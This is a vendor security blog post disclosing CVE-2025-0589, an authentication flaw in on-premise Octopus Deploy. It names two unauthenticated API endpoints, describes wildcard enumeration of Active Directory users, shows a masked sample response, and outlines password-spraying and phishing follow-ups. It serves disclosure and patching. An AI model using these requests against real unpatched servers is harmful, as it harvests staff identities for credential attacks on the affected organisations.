Unauthenticated Access to Active Directory via Octopus Deploy (CVE-2025-0589)

Author

Daniel Andrew

•

Head of Security

Updated

Thursday, March 6, 2025

Published

March 5, 2025

min read

TL;DR

Vulnerability: CVE-2025-0589 allows an unauthenticated attacker to exploit Octopus Deploy and read data from a connected Active Directory environment.
Impact: Data exposed includes names of personnel, email addresses, and local AD usernames (DN and SAM). This included data for service accounts.
Who’s Affected: On-Premise Octopus Deploy installations that use active directory for authentication in versions prior to 2024.4.7065 (or 2024.3.13071 for earlier feature streams)
Patch: Ensure you are running version 2024.3.13071 at least.
Disclosure & Bounty: Octopus patched quickly and paid a $3,000 bounty
Stay secure with Intruder: Intruder can scan your Octopus Deploy instances for this vulnerability.

APIs with Broken Authentication

In late 2024, Intruder’s security team was working on some research into APIs which expose endpoints that are missing authentication. The OWASP Top 10 for APIs lists Broken Authentication as number two, so we decided to look into some targets on Bug Bounty programs and see how prevalent these bugs really are.

API2:Broken Authentication bugs are simple to understand, both for attackers and defenders, and you could teach a newbie pentester to manually detect these bugs and start testing in less than a day. The basic premise is that the application server fails to perform the authentication step on certain endpoints, and requests can be made with no session token or API key whatsoever. Though these weaknesses are easy to discover, they are much more difficult to detect during a code review, which is one key reason why these simple bugs are so prevalent.

We developed tooling that can detect these weaknesses at scale, and our results included this bug in Octopus Deploy which exposes sensitive Active Directory information without authentication. We plan to release details of our tooling and process at an upcoming conference in 2025, so follow us to stay tuned!

What is Octopus Deploy?

Octopus Deploy is a popular deployment automation tool used to manage releases, handle infrastructure changes, and orchestrate continuous delivery (CD) pipelines. It integrates with multiple DevOps stacks and can connect to Active Directory for centralized identity.

Vulnerability Details

We discovered two API endpoints in vulnerable versions of Octopus Deploy which contained this vulnerability, and responses were returned without authentication:

GET /api/externalusers/directoryServices?partialName=<Query>
GET /api/externalgroups/directoryServices?partialName=<Query>

This part of the API is intended for use by administrators who want to search Active Directory to assign roles or add users. However, the authentication was broken on these endpoints, and sending a GET request with a query in the “partialName” parameter returned a JSON blob listing user emails, names of staff, local AD usernames (DN and SAM), and User Principal Names (UPNs) from Active Directory.

The endpoint also allowed a wildcard search, and although responses are limited to 1000 records, full data retrieval was still possible for an attacker by iterating through partial names to grab as much data as possible.

Below is a sample of the returned data including emails, names, and UPNs:

HTTP/2 200 OK
[...]

{
  "Identities": [
    {
      "IdentityProviderName": "Active Directory",
      "Claims": {
        "email": {
          "Value": operator@********.***,
          "IsIdentifyingClaim": false
        },
        "upn": {
          "Value": "operator@********.***",
          "IsIdentifyingClaim": true
        },
        "sam": {
          "Value": "Operator",
          "IsIdentifyingClaim": true
        },
        "dn": {
          "Value": "Operator",
          "IsIdentifyingClaim": false
        }
      }
    },
    {
      "IdentityProviderName": "Active Directory",
      "Claims": {
        "email": {
          "Value": "gge******@**********.onmicrosoft.com",
          "IsIdentifyingClaim": false
        },
        "upn": {
          "Value": "gge******@**********.onmicrosoft.com",
          "IsIdentifyingClaim": true
        },
        "sam": {
          "Value": "gge*******",
          "IsIdentifyingClaim": true
        },
        "dn": {
          "Value": "Gary Ge*******",
          "IsIdentifyingClaim": false
        }
    },
    {
      "IdentityProviderName": "Active Directory",
      "Claims": {
        "email": {
          "Value": "null",
          "IsIdentifyingClaim": false
        },
        "upn": {
          "Value": "f*******_ldap@*******.net",
          "IsIdentifyingClaim": true
        },
        "sam": {
          "Value": "f*******_ldap",
          "IsIdentifyingClaim": true
        },
        "dn": {
          "Value": "F*******_LDAP",
          "IsIdentifyingClaim": false
        }
    }

‍

As you can see, the bug is simple to exploit and could be found by a beginner. A natural assumption might be that these bugs are rare, but some of the bugs we found during our project had existed in applications for years undetected, even though the targets were listed on public bug bounty programs. This implies that there is a lot of unexplored attack surface out there, and many more low hanging fruits still ripe for picking. More on this in a later post.

Impact

An attacker can enumerate domain user details and perform a wildcard search to grab a large number of account records.

Armed with a wide list of active directory users, password spraying attacks can be mounted against thousands of users to find the few that use weak passwords. Phishing attacks can also be targeted using real information about employees and their job roles, making attacks more effective.

Although impact here is limited to basic information of staff members and other AD accounts, Active Directory information can still be a goldmine for attackers targeting your organization.

Organizations that connect their applications to AD typically use SSO throughout their estate, so if an attacker gets hold of just one user’s credentials, they could gain access to a wide range of services and be able to pivot into your network from there.

Stay Ahead of Emerging Threats

If you’re a Premium customer, we’ve got you covered - our active checks can detect this vulnerability in your environment. Looking to learn more? Chat with us about Premium or keep up with our latest security insights on Intel - our free vulnerability intelligence platform.